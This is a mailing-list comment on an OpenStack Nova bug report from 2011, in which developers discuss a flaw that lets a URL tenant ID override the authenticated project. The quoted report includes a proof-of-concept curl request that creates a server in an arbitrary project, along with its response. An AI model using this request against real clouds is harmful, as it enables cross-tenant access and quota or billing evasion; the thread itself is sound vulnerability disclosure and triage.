Comment 11 for bug 904072

Nachi Ueno (nati-ueno) wrote : Re: [Bug 904072] Re: project_id could be overwritten to any value by URI value

Hi All

>ttx
I'm ok with not disclosing this in the next two
weeks. Me, Rohit and Ravi found this bug.

>Vish
Thank you for your patch.
I have one question. Why do we still set project_id from the URL?

Cheers
Nati

2011/12/16 Vish Ishaya <email address hidden>:
> Comments below
>
> On Dec 16, 2011, at 1:30 PM, anotherjesse wrote:
>
>> ttx
>>
>> 1) you still need to be authenticated.  The keystone middleware doesn't
>> let the request hit the router if you fail to auth.
>>
>> 2) you can issue any openstack api request against any tenant.
>>
>> Because most logic in the API uses the context (not the URL) to specify
>> the resources you are interacting with (for example list servers uses
>> the tenant from the context)
>>
>>        instance_list = self.compute_api.get_all(context,
>>                                                 search_opts=search_opts)
>>
>> https://github.com/openstack/nova/blob/master/nova/api/openstack/v2/servers.py#L145
>>
>> So you can create a server in another project but delete, list, show
>> (and most other api calls) will not be able to modify it via the api.
>> This is because the way that the database layer is written is defensive
>> - it only lets you access data that your context says you have access
>> to.
>>
>> This is still bad in that it allows creation of resources outside of
>> your project (for quota/billing avoidance) and there could be more
>> tunnels.
>
> I believe this is incorrect.  The broken code actually sets context.project_id to whatever was in the url, so I think you can list and terminate instances in other projects as well.
>>
>> 3) only affects if you are the openstack api using keystone (not
>> deprecated auth)
>>
>> It shouldn't affect people who use the default (which is nova's internal
>> legacy auth) or who use the ec2 api
>
> legacy auth is also broken afaik, because it will successfully authenticate and then the authentication will be overwritten by the url.  EC2 auth shouldn't be affected.
>>
>> --
>> You received this bug notification because you are a member of Nova
>> Core, which is subscribed to the bug report.
>> https://bugs.launchpad.net/bugs/904072
>>
>> Title:
>>  project_id could be overwritten to any value by URI value
>>
>> Status in OpenStack Compute (Nova):
>>  Confirmed
>>
>> Bug description:
>>  project_id could be overwritten to any value by URI value.
>>  User can create a server on any project (even if it does not exist).
>>  The quota function will not work because of this bug. (So this bug is a security vulnerability.)
>>
>>  --Test condition
>>  user : demo (not admin)
>>  project_id: 2
>>
>>  -- Request
>>  stack@freecloud116:~/devstack$ curl -H "Content-type: application/json" -H "x-auth-token: 8bbdb554-a671-446e-a6c2-07326eeb9ad5" -d '{"server": {"min_count": 1, "flavorRef": "1", "name": "test5", "imageRef": "2", "max_count": 1}}' http://localhost:8774/v1.1/tushar2/servers  <-- invalid tenant_id
>>
>>  -- Response
>>  {"server": {"status": "BUILD", "updated": "2011-12-14T03:06:04Z", "hostId": "", "user_id": "demo", "name": "test5", "links": [{"href": "http://localhost:8774/v1.1/tushar2/servers/7", "rel": "self"}, {"href": "http://localhost:8774/tushar2/servers/7", "rel": "bookmark"}], "addresses": {}, "tenant_id": "tushar2", "image": {"id": "2", "links": [{"href": "http://localhost:8774/tushar2/images/2", "rel": "bookmark"}]}, "created": "2011-12-14T03:06:04Z", "uuid": "5b63c965-8966-4ebc-ae1b-1c1c551a044c", "accessIPv4": "", "accessIPv6": "", "key_name": null, "adminPass": "id8SngCb7xeRq67K", "progress": 0, "flavor": {"id": "1", "links": [{"href": "http://localhost:8774/tushar2/flavors/1", "rel": "bookmark"}]}, "config_drive": "", "id": 7, "metadata": {}}}stack@freecloud116:~/devstack$
>>
>>  -- DB result
>>  instance with project_id "tushar2" is created
>>
>>  mysql> select id,project_id from instances;
>>  +----+------------+
>>  | id | project_id |
>>  +----+------------+
>>  |  1 | demo5      |
>>  |  2 | demo5      |
>>  |  3 | tushar     |
>>  |  4 | tushar1    |
>>  |  5 | tushar2    |
>>  |  6 | tushar2    |
>>  |  7 | tushar2    |
>>  +----+------------+
>>  7 rows in set (0.00 sec)
>>
>>  --Cause of this bug
>>  This code set project_id to request object from uri
>>  https://github.com/openstack/nova/blob/master/nova/api/openstack/v2/__init__.py#L78
>>
>>  Then this code set the project_id to context object
>>  https://github.com/openstack/nova/blob/master/nova/api/openstack/wsgi.py#L554
>>
>> To manage notifications about this bug go to:
>> https://bugs.launchpad.net/nova/+bug/904072/+subscriptions